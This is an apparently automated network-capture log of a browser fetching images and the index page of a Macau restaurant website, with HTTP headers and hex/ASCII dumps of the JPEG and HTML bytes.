c3 d1 42 87 bb f6 58 67 cb 58 6c 88 b8 d9 d9 16 6c bc 57 a0 82 e4 33 c8 87 74 67 86 c4 72 47 ba ff 00 89 0b e3 e0 6a 3d c9 63 bd 50 77 13 04 97 ad 5d 8f 35 ec 5d e3 b3 45 77 27 90 39 25 b3 63 30 a8 99 35 b7 5e 0b 50 cc b1 10 63 0d 04 f1 bc 7b 26 c3 8e cb eb f8 6d a7 b9 27 75 23 b8 98 24 bd 6b
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed>!"1AQ2aBS1!AQaq"2R#?h7i~ 787J"mVYQD'=9D]bd{-Rb%cgyKzwMvZ<GLQbgZG^wi*d9^ wtg0(\<TlIK9:ud~<S*p`@C!%E^'\4TRbJT'N$~{~+@x|]@4mWzTZ:XG)eWxVi%Iu lA= nZwY;-X,\6!cJn sdux}V^"o,H`.C[%Sdl~mkT=6Z4*=/6fVs,g#L|wxKDAYbI>Ou$rfL[/irP)~+CUAooWd]BXgXllW3tgrGj=cPw]5]Ew'9%c05^Pc{&m'u#$k
                                                                                                                                                              Mar 13, 2023 05:26:12.977006912 CET1977INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 1061
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "1eb317f8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:18 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 28 03 01 11 00 02 11 01 03 11 01 ff c4 00 85 00 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 03 06 07 04 05 01 01 00 01 05 01 00 00 00 00 00 00 00 00 00 00 00 00 02 01 03 04 05 06 08 10 00 01 04 01 03 03 03 04 03 00 00 00 00 00 00 00 01 02 03 04 05 11 00 12 06 22 13 07 21 14 15 31 41 42 23 61 81 32 11 00 02 01 02 05 04 01 00 0b 01 00 00 00 00 00 00 01 02 11 00 03 21 31 12 13 04 51 61 22 05 41 f0 81 a1 b1 d1 32 42 62 23 33 15 16 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 df 77 eb cb 35 a0 a6 fd 29 4d fa 52 9b f4 a5 37 e9 4a d6 6c 1a e3 af 78 eb c6 e6 f2 d6 c6 b9 60 dc fb 74 c0 80 cc d0 b1 ee d3 b8 ac bb 32 2e dc 7a 63 01 59 fe 35 d5 df b7 c6 6f 5d c5 de 77 5f ec 8d 28 1f f5 7c cb a4 7d b5 92 40 d0 b2 7a fd 33 ab 47 91 a8 69 57 c9 fc 8d ca ef 4c d9 50 2a ac 2b 6b e2 56 c0 71 b8 ef 3a fc a8 81 7b dc 79 c6 a4 25 b4 25 2d 9f c1 59 27 1e 9a d8 fb de 0d 93 ca e5 72 6f 6a 2a ac 8a 15 48 52 4b 2c c9 62 18 00 00 e8 64 d4 ee a0 d4 cc 7b 57 88 ef 00 e2 70 53 77 6d 2e 55 b4 8a 38 dc 6a b7 91 d5 44 65 c6 1b 96 13 60 fa 19 11 df 5a 9a 52 32 0a 8f 5a 52 3d 30 ad a7 fc 9c 36 f4 7c 4b 7b 97 58 b9 b6 2d 25 d5 00 80 de 64 0d 2c 48 8f ac 0f dd 07 2a 86 d2 89 38 c4 03 52 3f c1 38 4b d2 93 57 5c f5 da 27 da 71 65 72 6a a9 12 5d 8c 5a 8f b6 21 92 98 cf 21 0c 85 3b 90 85 02 e2 4b 78 f4 e8 3f 5d 49 fd 2f 05 9f 6e d9 b9 a9 ac ee a9 25 61 7c 75 69 60 17 cb 23 e4 0a c6 1e 26 aa 6d 2e 42 72 9a 0f 1b 71 c8 b5 b5 8d da dc 22 15 8d 9d 08 b8 f9 87 6e 2b 18 61 97 9f 60 c8 8f 18 d6 ba 44 b7 02 86 d4 15 a5 43 a8 e4 27 68 d3 fe 7f 8c 96 d0 5c 78 66 b7 af 51 b9 6c 28 24 6a 55 da 3f c8 67 01 a8 1c ce 02 29 b2 a0 62 7e 27 31 f7 67 58 bc ab 9b 19 95 d5 75 52 64 77 20 53 77 fe 36 3e c4 0e df b8 58 71 de a0 90 a5 6e 50 cf 51 38 fb 6b 98 b9 c9 b9 72 da 5b 63 e2 93 a4 61 86 a3 27 be 7d 6a c1 62 40 1d 2a c0 3c 85 cb 3e 42 e2 c9 cb 26 e5 48 bf 0d 0b 96 64 c4 8b 22 34 9e c0 01 a2 e4 67 59 5b 24 a0 0f 43 b3 23 fb 3a ce ff 00 6b 97 b8 f7 0b 02 5e 35 4a ab 2b 46 52 a4 15 c3 e3 0a 96 eb 49 3d 6b 8a 57 33 e4 93 55 74 a9 56 8a 78 f2 18 ec c5 b5 0a 6d ac 2d 88 eb 43 8d 36 80 11 86 d2 85 36 9c 06 f6 e0 0c 7d 35 66 e7 b4 e4 dc 37 35 3c ee 00 1b 01 88 52 08 03 0f 10 20 46 98 aa 1b 8c 67 bd 11 cc b9 13 72 e3 4e 45 8e 25 43 ab f8 58 ee f6 59 e9 83 d9 53 1d 9c 14 60 fe b5 11 b8 8d df 7c e7 41 ec f9 21 c3 86 c4 26 81 80 fc 91 a6 32 e8 62 73 ef 4d 6d 33 da 2a 51 cd af cd 6b 15 2f bb 0a 7c 48 91 cc 58 8a 9d 5d 06 5b ec b2 73 fa da 91 21 87 1e 40 4e 4e d0 95 8d bf 8e 35 2f f5 79 1b 62 d9 2a ca 04 0d 48 8c 40 e8 19 94 b0 ed
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed("!1AB#a2!1Qa"A2Bb#3?w5)MR7Jlx`t2.zcY5o]w_(|}@z3GiWLP*+kVq:{y%%-Y'roj*HRK,bd{WpSwm.U8jDe`ZR2ZR=06|K{X-%d,H*8R?8KW\'qerj]Z!!;Kx?]I/n%a|ui`#&m.Brq"n+a`DC'h\xfQl($jU?g)b~'1gXuRdw Sw6>XqnPQ8kr[ca'}jb@*<>B&Hd"4gY[$C#:k^5J+FRI=kW3UtVxm-C66}5f75<R FgrNE%CXYS`|A!&2bsMm3*Qk/|HX][s!@NN5/yb*H@
                                                                                                                                                              Mar 13, 2023 05:26:12.980143070 CET1977OUTGET /images/menu06.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:13.184950113 CET2014INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 1321
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "5efe63f8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:18 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 48 03 01 11 00 02 11 01 03 11 01 ff c4 00 84 00 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 04 05 07 06 03 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 08 10 00 02 02 01 04 01 04 01 02 07 01 00 00 00 00 00 02 03 01 04 05 00 11 12 06 21 41 22 13 14 31 61 42 51 71 32 52 53 15 07 08 11 00 01 03 02 03 06 06 03 00 00 00 00 00 00 00 00 01 00 11 02 31 03 21 41 12 51 61 81 b1 13 04 f0 71 91 a1 c1 d1 23 14 34 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 df 79 eb e5 95 e0 27 3d 11 39 e8 89 cf 44 4e 7a 22 73 d1 13 9e 88 9c f4 44 e7 a2 2d 4f 27 95 c9 75 2e 9b d0 e7 ac dd 6e 2a 33 88 b5 7b 2d 91 ab 32 b6 59 b0 bb 12 a8 53 18 3e 48 54 31 11 c3 7e 3e 77 98 f3 ae 92 4c 23 1d 39 ae f9 ce 56 ad 43 41 67 72 4e dc 7e 14 14 62 b0 2d a3 d7 f3 9d a2 72 37 6f 77 7b f6 78 46 30 91 55 75 c1 6e 85 1b 24 25 0c 86 14 99 4c c0 04 04 6d eb e7 50 20 18 19 66 aa 2d c0 88 ca 6e 4c 89 a3 0f 8f 65 3a df 4d eb 3d 76 ae 4d b9 f7 64 b2 2e a3 d9 df 81 58 e3 9a 94 01 29 4b 5b 3e 52 96 a9 d3 05 10 53 b8 c4 4e f3 e3 78 db 79 93 6a 31 ab d5 95 a5 db c2 d8 3a 9c b4 9b 06 fa 2a c3 31 80 eb 7d 6f ab f7 2a 16 b1 cf c8 df c3 76 55 63 eb e5 81 c9 4b 66 09 16 09 53 ee ac c2 10 88 18 e6 10 5e e9 da 60 87 6d 4c a1 18 c4 86 a1 56 b9 6a 16 ed cc 10 e4 49 9f 0d 87 77 a8 51 2c 7f cf 29 c6 0b 28 f8 55 bc 6e 63 12 8a 0e 21 bb 7a 89 93 7e db 96 92 86 50 47 27 d6 88 f9 60 86 4c cb 78 fc ed be a3 a2 18 ed e1 c9 41 ed 46 82 71 04 35 48 cf 70 c4 22 70 fd 23 11 de f1 dd 65 95 72 d9 1b 98 ec e5 4a 16 cd ed af f5 2d cf c9 0b 64 ca 89 12 40 10 cd a7 8c c9 f3 0d e3 70 df 7d 34 40 4d b1 aa 0b 76 a1 74 43 12 41 03 26 3e df 6e b8 0e d9 38 c0 ec 39 65 62 69 b6 85 54 5a 7a e6 bb 5a 0e d8 c5 a5 13 21 f1 a5 30 21 f8 d8 76 9d bf ba 75 9c c0 d4 59 72 df d3 ac e9 0c 1f c6 41 6c 61 b8 7f e8 5b 7c a2 62 23 21 69 93 e3 f6 7d 33 3e 5f cb 8f 9d 6e df 99 77 8f ec 3e 67 92 ce 43 af 62 9d d4 83 2d 8e 55 8c ce 4d 75 d8 fc c7 c1 7a ba bf d7 c8 ba 42 3e 4a 24 83 73 03 86 c5 2c 13 81 f3 e7 6d bc e5 a0 69 71 8f 8d 8b 93 a5 13 6f 50 c4 e7 88 c3 83 3f 15 ce e3 3b 8e 7f 13 48 71 b5 2d a9 98 f0 77 d8 4d 3b 75 6b dc 5a 9d fe 45 0d 95 36 16 5f a8 ed 3a 81 32 03 2a 42 fc e0 18 53 78 07 9a 97 57 bf 76 aa 90 c8 0c 98 bf 9d a2 bc 05 6e b5 7b 44 ab 27 fd 4d 41 3d 4c 95 14 ff 00 15 f1 d4 8b 92 0a 47 73 70 67 9b e4 71 e3 4e 0a 99 b9 fc b5 8a 45 8f 7d d3 75 53 be 79 33 16 40 91 95 b6 0c 01 b4 99 31 27 33 31 11 be f3 b7 af e7 55 d4 59 95 0d c9 10 c7 6b f1 56 4c ee dd 8d e5 9c 2b 17 97 6a 3b 23 21 d9 85 be ad 66 83 5b 10 50 2c 10 35 10 ac e2
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedH!A"1aBQq2RS1!AQaq#4?y'=9DNz"sD-O'u.n*3{-2YS>HT1~>wL#9VCAgrN~b-r7ow{xF0Uun$%LmP f-nLe:M=vMd.X)K[>RSNxyj1:*1}o*vUcKfS^`mLVjIwQ,)(Unc!z~PG'`LxAFq5Hp"p#erJ-d@p}4@MvtCA&>n89ebiTZzZ!0!vuYrAla[|b#!i}3>_nw>gCb-UMuzB>J$s,miqoP?;Hq-wM;ukZE6_:2*BSxWvn{D'MA=LGspgqNE}uSy3@1'31UYkVL+j;#!f[P,5
                                                                                                                                                              Mar 13, 2023 05:26:13.187688112 CET2015OUTGET /images/indexpic02.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
                                                                                                                                                              Mar 13, 2023 05:26:13.393273115 CET2103INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 92859
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:24 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "02eb1f7a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:18 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 22 64 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 00 a0 00 00 01 01 00 03 00 00 00 01 01 5e 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d2 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 35 3a 32 38 20 31 31 3a 33 33 3a 35 31 00 00 00 00 04 90 00 00 07 00 00 00 04 30 32 32 31 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 00 a0 a0 03 00 04 00 00 00 01 00 00 01 5e 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 6e 01 1b 00 05 00 00 00 01 00 00 01 76 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 00 00 01 7e 02 02 00 04 00 00 00 01 00 00 20 de 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c 72 54 52 43 00 00 04 3c 00 00 08 0c 67 54 52 43 00 00 04 3c 00 00 08 0c 62 54 52 43 00 00 04 3c 00 00 08 0c 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 20 48 65 77 6c 65 74 74 2d 50 61 63 6b 61 72 64 20 43 6f 6d 70 61 6e 79 00 00 64 65 73 63 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 f3 51 00 01 00 00 00 01 16 cc 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f
                                                                                                                                                              Data Ascii: "dExifMM*^(12i ''Adobe Photoshop CS6 (Windows)2020:05:28 11:33:510221^nv(~ HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http://
                                                                                                                                                              Mar 13, 2023 05:26:21.617903948 CET2501OUTGET /images/indexpic06.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
                                                                                                                                                              Mar 13, 2023 05:26:21.846616030 CET2505INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 170351
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:24 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "ec8ed2f7a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:27 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 31 39 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 90 87 69 00 04 00 00 00 01 00 00 00 a4 00 00 00 d0 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 36 3a 31 38 20 31 33 3a 30 30 3a 30 39 00 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 01 3e a0 03 00 04 00 00 00 01 00 00 01 5e 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 1e 01 1b 00 05 00 00 00 01 00 00 01 26 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 00 00 01 2e 02 02 00 04 00 00 00 01 00 00 30 03 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c 72 54 52 43 00 00 04 3c 00 00 08 0c 67 54 52 43 00 00 04 3c 00 00 08 0c 62 54 52 43 00 00 04 3c 00 00 08 0c 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 20 48 65 77 6c 65 74 74 2d 50 61 63 6b 61 72 64 20 43 6f 6d 70 61 6e 79 00 00 64 65 73 63 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 f3 51 00 01 00 00 00 01 16 cc 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii: 19ExifMM*bj(1r2i''Adobe Photoshop CS6 (Windows)2020:06:18 13:00:09>^&(.0HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http://www.iec.chIEC http://www.iec.ch
                                                                                                                                                              Mar 13, 2023 05:26:28.660417080 CET2715OUTGET /Index.asp HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
                                                                                                                                                              Mar 13, 2023 05:26:28.864861012 CET2716INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:34 GMT
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Content-Length: 14526
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Cache-control: private
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 62 6c 65 2d 64 65 76 69 63 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 63 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 6f 62 69 6c 65 2d 61 67 65 6e 74 22 20 63 6f 6e 74 65 6e 74 3d 22 66 6f 72 6d 61 74 3d 78 68 74 6d 6c 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 67 6f 75 72 6d 65 74 68 6f 75 73 65 6d 61 63 61 75 2e 63 6f 6d 2f 6d 2e 68 74 6d 6c 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 6f 62 69 6c 65 2d 61 67 65 6e 74 22 20 63 6f 6e 74 65 6e 74 3d 22 66 6f 72 6d 61 74 3d 68 74 6d 6c 